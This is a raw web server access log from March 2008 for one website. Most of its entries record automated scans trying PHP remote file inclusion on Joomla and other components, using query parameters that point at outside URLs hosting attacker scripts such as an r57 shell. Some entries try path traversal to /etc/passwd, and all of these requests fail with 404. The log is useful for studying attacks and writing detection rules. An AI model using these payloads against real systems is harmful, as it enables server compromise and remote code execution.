88.84.145.141 - - [02/Mar/2008:19:08:30 -0800] "GET /logs/access_080127.log/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:08:30 -0800] "GET /appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:08:30 -0800] "GET /logs/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:09:23 -0800] "GET /logs/access_080127.log/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:09:23 -0800] "GET /appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:09:23 -0800] "GET /logs/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:10:41 -0800] "GET /logs/access_071126.log/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:19:10:54 -0800] "GET /logs/access_080121.log/home.php?basepath=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:19:10:55 -0800] "GET /home.php?basepath=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:19:10:55 -0800] "GET /logs/home.php?basepath=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:11:20 -0800] "GET /logs/access_071126.log/appserv/errors.php?error=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.9.138 - - [02/Mar/2008:19:11:36 -0800] "GET /logs/access_071112.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.9.138 - - [02/Mar/2008:19:11:37 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:12:14 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:12:39 -0800] "GET /logs/access_080211.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:12:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:12:40 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:19:13:17 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:19:13:28 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
87.106.9.138 - - [02/Mar/2008:19:13:31 -0800] "GET /logs/access_080114.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:19:13:39 -0800] "GET /logs/access_080107.log/home.php?basepath=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:15:26 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:15:27 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:15:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:15:40 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:15:40 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:16:10 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:16:10 -0800] "GET /config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:16:10 -0800] "GET /logs/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:16:14 -0800] "GET /logs/access_080127.log/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [02/Mar/2008:19:16:22 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:16:25 -0800] "GET /logs/access_071126.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:16:25 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.145.141 - - [02/Mar/2008:19:16:25 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:17:23 -0800] "GET /logs/access_071126.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:17:23 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.128.80.82 - - [02/Mar/2008:19:17:23 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.67.83.25 - - [02/Mar/2008:19:17:26 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.80.70.21 - - [02/Mar/2008:19:18:27 -0800] "GET /logs/access_071112.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.80.70.21 - - [02/Mar/2008:19:18:28 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.66.110 - - [02/Mar/2008:19:18:45 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdcafe.com/im/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.toulouseangloexchange.com"
87.106.66.110 - - [02/Mar/2008:19:18:45 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdcafe.com/im/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:18:51 -0800] "GET /@scanhttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:19:45 -0800] "GET /@rfihttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.80.70.21 - - [02/Mar/2008:19:19:48 -0800] "GET /logs/access_080114.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:20:54 -0800] "GET /logs/access_080128.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:21:08 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:21:09 -0800] "GET /config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:21:09 -0800] "GET /logs/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:21:18 -0800] "GET /logs/access_080127.log/config.inc.php?path_escape=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:22:17 -0800] "GET /logs/access.log/@scanhttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:22:18 -0800] "GET /logs/@scanhttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.217.247.166 - - [02/Mar/2008:19:22:44 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:22:52 -0800] "GET /logs/access.log/@rfihttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:22:52 -0800] "GET /logs/@rfihttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:23:40 -0800] "GET /logs/access_080211.log/@scanhttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:19:24:03 -0800] "GET /logs/access.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:19:24:03 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:24:03 -0800] "GET /logs/access_080121.log/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:24:04 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:24:04 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.148.36 - - [02/Mar/2008:19:24:19 -0800] "GET /logs/access_080211.log/@rfihttp://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:24:38 -0800] "GET /logs/access_080127.log/index.php?s=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:24:39 -0800] "GET /index.php?s=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:24:39 -0800] "GET /logs/index.php?s=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.21.165.64 - - [02/Mar/2008:19:25:15 -0800] "GET /logs/access.log/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:27:47 -0800] "GET /logs/access_080211.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:27:48 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
58.26.137.64 - - [02/Mar/2008:19:30:34 -0800] "GET /logs/access_080128.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [02/Mar/2008:19:30:35 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [02/Mar/2008:19:30:36 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
217.13.86.10 - - [02/Mar/2008:19:31:38 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.26.137.64 - - [02/Mar/2008:19:33:24 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
64.185.237.35 - - [02/Mar/2008:19:34:10 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
65.98.58.250 - - [02/Mar/2008:19:34:14 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.35 - - [02/Mar/2008:19:34:15 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:34:20 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
72.30.226.156 - - [02/Mar/2008:19:34:50 -0800] "GET /logs/access_080127.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:19:35:18 -0800] "GET /logs/access_071112.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:19:35:18 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:19:35:18 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [02/Mar/2008:19:35:20 -0800] "GET /logs/access.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [02/Mar/2008:19:35:20 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:36:13 -0800] "GET /include/write.php?dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:36:17 -0800] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
208.67.83.25 - - [02/Mar/2008:19:36:42 -0800] "GET /logs/access.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.67.83.25 - - [02/Mar/2008:19:36:42 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.91.30.3 - - [02/Mar/2008:19:36:45 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:19:37:48 -0800] "GET /logs/access_071224.log/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.225.91 - - [02/Mar/2008:19:38:00 -0800] "GET /logs/access_080114.log//home.php?content=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.225.91 - - [02/Mar/2008:19:38:00 -0800] "GET //home.php?content=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.225.91 - - [02/Mar/2008:19:38:01 -0800] "GET /logs//home.php?content=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.22.112.178 - - [02/Mar/2008:19:38:24 -0800] "GET /logs/access_080211.log/modules/Neos_Chronos/header.php?base_folder=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.112.178 - - [02/Mar/2008:19:38:24 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.112.178 - - [02/Mar/2008:19:38:24 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:19:38:27 -0800] "GET /logs/access_080114.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.193.225.91 - - [02/Mar/2008:19:38:35 -0800] "GET /logs/access_071231.log//home.php?content=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.22.112.178 - - [02/Mar/2008:19:38:43 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:39:11 -0800] "GET /logs/access_080121.log/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:39:11 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:39:12 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [02/Mar/2008:19:40:30 -0800] "GET /logs/access_080211.log/admin.php?cal_dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [02/Mar/2008:19:40:30 -0800] "GET /admin.php?cal_dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [02/Mar/2008:19:40:31 -0800] "GET /logs/admin.php?cal_dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [02/Mar/2008:19:40:48 -0800] "GET /admin.php?cal_dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:40:49 -0800] "GET /logs/access_080107.log/include/write.php?dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:40:50 -0800] "GET /include/write.php?dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
213.198.27.34 - - [02/Mar/2008:19:40:50 -0800] "GET /logs/include/write.php?dir=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
217.195.193.190 - - [02/Mar/2008:19:41:11 -0800] "GET /logs/access.log/init_basic.php?GALLERY_BASEDIR=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:19:41:35 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
65.98.58.250 - - [02/Mar/2008:19:42:09 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.98.58.250 - - [02/Mar/2008:19:42:09 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.98.58.250 - - [02/Mar/2008:19:42:09 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
219.94.162.186 - - [02/Mar/2008:19:43:55 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
